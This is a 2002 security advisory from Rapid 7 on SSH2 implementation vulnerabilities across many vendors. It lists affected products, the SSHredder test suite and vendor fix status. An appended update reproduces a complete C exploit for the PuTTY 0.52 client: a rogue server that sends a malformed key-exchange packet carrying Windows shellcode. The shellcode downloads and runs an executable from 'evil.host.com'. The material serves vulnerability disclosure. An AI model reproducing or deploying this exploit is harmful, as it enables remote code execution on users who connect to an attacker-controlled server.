|
COMMAND Vulnerabilities in SSH2 Implementations from Multiple Vendors SYSTEMS AFFECTED KNOWN VULNERABLE: o F-Secure Corp. SSH servers and clients for UNIX v3.1.0 (build 11) and earlier o F-Secure Corp. SSH for Windows v5.2 and earlier o SSH Communications Security, Inc. SSH for Windows v3.2.2 and earlier o SSH Communications Security, Inc. SSH for UNIX v3.2.2 and earlier o FiSSH SSH client for Windows v1.0A and earlier o InterSoft Int'l, Inc. SecureNetTerm client for Windows v5.4.1 and earlier o NetComposite ShellGuard SSH client for Windows v3.4.6 and earlier o Pragma Systems, Inc. SecureShell SSH server for Windows v2 and earlier o PuTTY SSH client for Windows v0.53 and earlier (v0.53b not affected) o WinSCP SCP client for Windows v2.0.0 and earlier APPARENTLY NOT VULNERABLE: o BitVise WinSSHD server for Windows v3.05 o LSH v1.5 o OpenSSH v3.5 and earlier o TTSSH SSH Extension for TeraTerm Pro o VanDyke SecureCRT client v3.4.3 for Windows o VanDyke VShell server v1.2 for Windows UNKNOWN / NOT TESTED: o MacSSH o SSHv1 implementations (see {1}) o SSHv2 enabled network appliances PROBLEM ______________________________________________________________________ Rapid 7, Inc. Security Advisory Visit http://www.rapid7.com/ to download NeXpose(tm), our advanced vulnerability scanner. Linux and Windows 2000 versions are available now! _______________________________________________________________________ Rapid 7 Advisory R7-0009 Vulnerabilities in SSH2 Implementations from Multiple Vendors Published: December 16, 2002 Revision: 1.0 http://www.rapid7.com/advisories/R7-0009.txt CERT: CA-2002-36 http://www.cert.org/advisories/CA-2002-36.html CVE: Multiple CVE CANs assigned: o CAN-2002-1357 (incorrect length) o CAN-2002-1358 (lists with empty elements/empty strings) o CAN-2002-1359 (large packets and large fields) o CAN-2002-1360 (string fields with zeros) Summary SSH servers and clients from several vendors contain vulnerabilities that may allow denial-of-service attacks and/or arbitrary code execution. The vulnerabilities arise from various deficiencies in the greeting and key-exchange-initialization phases of the SSHv2 transport layer. Detailed analysis To study the correctness and security of SSH server and client implementations {2}, the security research team at Rapid 7, Inc. has designed the SSHredder SSH protocol test suite containing hundreds of sample SSH packets. These invalid and/or atypical SSH packets focus on the greeting and KEXINIT (key exchange initialization) phases of SSH connections. We then applied the SSHredder suite to some popular SSH servers and clients, observing their behavior when presented with a range of different input. Several implementation errors were discovered, most of which involve memory access violations. While the impact is different for each product tested, some of these errors were easily exploitable, allowing the attacker to overwrite the stack pointer with arbitrary data. In most cases, only the most current versions of the applications were tested. Vendors listed as "Apparently NOT VULNERABLE" are encouraged to run the tests against older versions of their applications. The SSHredder test suite is now available for download from Rapid 7's web site ( http://www.rapid7.com ). A pre-release version of SSHredder was provided to SSH vendors for testing prior to public disclosure. SSHredder has been released under the BSD license. The test cases combine several test groups of similarly structured data: o Invalid and/or incorrect SSH packet lengths (including zero, very small positive, very large positive, and negative). o Invalid and/or incorrect string lengths. These were applied to the greeting line(s), plus all the SSH strings in the KEXINIT packets). o Invalid and/or incorrect SSH padding and padding lengths. o Invalid and/or incorrect strings, including embedded ASCII NULs, embedded percent format specifiers, very short, and very long strings. This test group was applied to the greeting line(s), plus all the SSH strings in the KEXINIT packets). o Invalid algorithm lists. In addition to the existing string tests, invalid encryption, compression, and MAC algorithm names were used, including invalid algorithm domain qualifiers; invalid algorithm lists were created by manipulating the separating commas. The individual tests in each group were combined systematically to produce a test suite of 666 packets. A full permutation of every test in each test group would have yielded a test suite that is too large to distribute, so a representative sample of packets was chosen from each group. Please note that greeting and KEXINIT are only the first and second phases of SSH connections. A full test suite for every SSH protocol message could potentially reveal other latent vulnerabilities. Notes [1] While SSHv1 has no KEXINIT phase, many of these test cases could affect both SSHv1 and SSHv2 in a generic way). SSHv1 implementations were not tested. [2] The SSH protocol is described in several IETF drafts, which can be found at http://www.ietf.org/ids.by.wg/secsh.html . Update (02 January 2003) ====== PUTTY SSH-Client Exploit by Rand & Dani at IProyectos Division Seguridad [www.iproyectos.com] : /* * Putty v0.52 and minor exploit * by Rand & Dani at IProyectos Division Seguridad ( www.iproyectos.com = ) * Contact: seguridad@iproyectos.com * * Tested on linux and cygwin against putty 0.52 running on WinXP * and Win2000. * * * Instructions: * * * Define WINXP to use against WinXP, otherwise Win2K offset will be = used. * * Change URL in the shellcode to an exe of your chose. That will * be executed upon exploitation. * * * If you want to do multiple tests do: * * while true ; do ./a.out ; done * * ...or if you want a functional daemon rewrite the code to fork. * * * Contents: * * This is a proof of concept on the security advisory by I-Defense = about * multiple vendors ssh clients possible buffer overflows. * The shellcode was borrowed from undersec.net. * * * The problem: * * A validation error on SSH.C lets client to server cipher smash * the stack, compromising code execution flow. * * * Solution: * * Upgrade your SSH clients. * * * Acknowledge to Carles for assistence with coding and to * nurx2 and zon for testing. * * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #define PORT 22 #define QUEUE 8 /* Define for Win XP, leave undefined for Win2k */ #define WIN_XP int=20 main(int argc, char **argv) { =20 char pdu_head[] =3D = "\x53\x53\x48\x2d\x32\x2e\x30\x2d\x31\x2e\x32\x37\x20\x73\x73\x68" "\x6c\x69\x62\x3a\x20\x57\x69\x6e\x53\x53\x48\x44\x20\x33\x2e\x30" "\x35\x0d\x0a\x00\x00\x4e\xec\x01\x14\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"; #ifdef WIN_XP char ret[] =3D "\x70\x35\x52\x77"; #else char ret[] =3D "\x56\x9A\x3C\x78"; #endif =20 char junk[] =3D "\x00\x00\x07\xDE"; char shell[] =3D = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90= \x90\x90" = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90= \x90\x90" = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90= \x90\x90" "\xEB\x30\x5F\xFC\x8B\xF7\x80" = "\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2= \x04\xC1" = "\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2= \x7C\x8B" = "\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8= \x8B\x40" = "\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C= \x03\x7D" = "\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B= \xF8\x33" = "\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A= \x03\x80" = "\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51= \xF3\xA6" = "\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1= \xE0\x02" = "\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40= \x3C\x03" = "\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0= \xAD\x03" = "\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC= \x8D\x76" = "\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E= \x74\x06" = "\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E= \xEB\x02" = "\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D= \xFC\x8D" = "\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45= \xE4\xFC" = "\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43= \xE2\xE1" = "\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53= \x51\x53" = "\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43= \xEB\xF9" = "\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4= \xFF\xD0" = "\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF= \xD0\x8D" = "\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52= \x8D\x7B" = "\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6= \x1F\xC1" = "\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B= \x45\xB4" = "\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC= \xFF\xD0" = "\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B= \x55\xA4" = "\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC= \xFF\xD0" = "\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F= \x64\x75" = "\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32= \x2E\x64" = "\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08= \x4C\x6F" = "\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74= \x08\x5F" = "\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63= \x08\x5F" = "\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69= \x74\x50" = "\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6C= \x08\x49" = "\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72= \x6E\x65" = "\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74= \x52\x65" = "\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F= \x73\x65" = "\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x65= \x08" "http://evil.host.com/pro.exe" "\x08\x01"; =20 int sockfd, clientfd; struct sockaddr_in server, client; int len =3D sizeof(client); int cont, cont_comas; =20 char buf[20243]; =20 /* We create the malformed packet */ memset(buf, 0x61, sizeof(buf)); =09 cont_comas=3D0; for(cont=3D125;cont<sizeof(buf);cont+=3D65) { cont_comas++; if(cont_comas>30) { memcpy(buf + cont, junk, sizeof(junk)-1); =09 cont_comas=3D0; cont+=3D3; } else buf[cont]=3D0x2c; } memcpy(buf+sizeof(buf)-6,"\x00\x00\x00\x00\x00\x00",6); memcpy(buf, pdu_head, 61); memcpy(buf + 0x1098, ret ,4); memcpy(buf + 0x109c, shell, sizeof(shell)); =20 /* We listen on port PORT */ if ((sockfd =3D socket(AF_INET, SOCK_STREAM, 0)) =3D=3D -1) { perror("socket"); exit(-1); } bzero(&server, sizeof(server)); =20 server.sin_family =3D AF_INET; server.sin_addr.s_addr =3D htonl(INADDR_ANY); server.sin_port =3D htons(PORT); =20 if (bind(sockfd, (struct sockaddr *) & server, sizeof(server)) =3D=3D -1) { perror("bind"); exit(-1); } listen(sockfd, QUEUE); if ((clientfd =3D accept (sockfd, (struct sockaddr *) & client, &len)) =3D=3D -1) { perror("accept"); exit(-1); } /* We send the junk and exploit */ write(clientfd,buf,sizeof(buf)); /* This will fix local connections closing too fast */ sleep(10); =20 close(clientfd); close(sockfd); return 0; /* Greets to the people at #vemo. Dedicated to the monster under my = bed. */ } SOLUTION Vendor status and information F-Secure Corporation http://www.f-secure.com Vendor has been notified. Release information is unknown at this time. F-Secure has characterized this issue as not exploitable. FiSSH http://pgpdist.mit.edu/FiSSH/index.html Vendor has been notified. Release information is unknown at this time. NetComposite (ShellGuard) http://www.shellguard.com Vendor has been notified. Release information is unknown at this time. Pragma Systems, Inc. http://www.pragmasys.com Vendor has been notified. The fixed version is SecureShell v3.0, which was released on November 25 2002. PuTTY http://www.chiark.greenend.org.uk/~sgtatham/putty/ Vendor has been notified. The fixed version is PuTTY v0.53b, which was released on November 12, 2002. SSH Communications Security, Inc. http://www.ssh.com Vendor has been notified. Release information is unknown at this time. SSH, Inc. has characterized this issue as not exploitable. SecureNetTerm (InterSoft International, Inc.) http://www.securenetterm.com Vendor notified. The fixed version is SecureNetTerm v5.4.2, released on November 14 2002. WinSCP2 http://winscp.vse.cz/eng/ Vendor has been notified. Release information is unknown at this time. Solution No solutions available yet. Contact Information Rapid 7 Security Advisories Email: advisory@rapid7.com Web: http://www.rapid7.com/ Phone: +1 (212) 558-8700 Disclaimer and Copyright Rapid 7, Inc. is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice. This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (OpenBSD) iD8DBQE9/a5kcL76DCfug6wRAoIdAJ0Xg1HUeXQk5aNzBaKVcS4XP9rlpACguQk6 G2ihG+Zr3V/VE/1C21p4yf4= =iqCp -----END PGP SIGNATURE----- ============================== Rapid 7 Security Research Team Email: advisory@rapid7.com Web: http://www.rapid7.com/ Phone: +1 (212) 558-8700 PGP: http://www.rapid7.com/advisories/R7-PKey2002.txt ==============================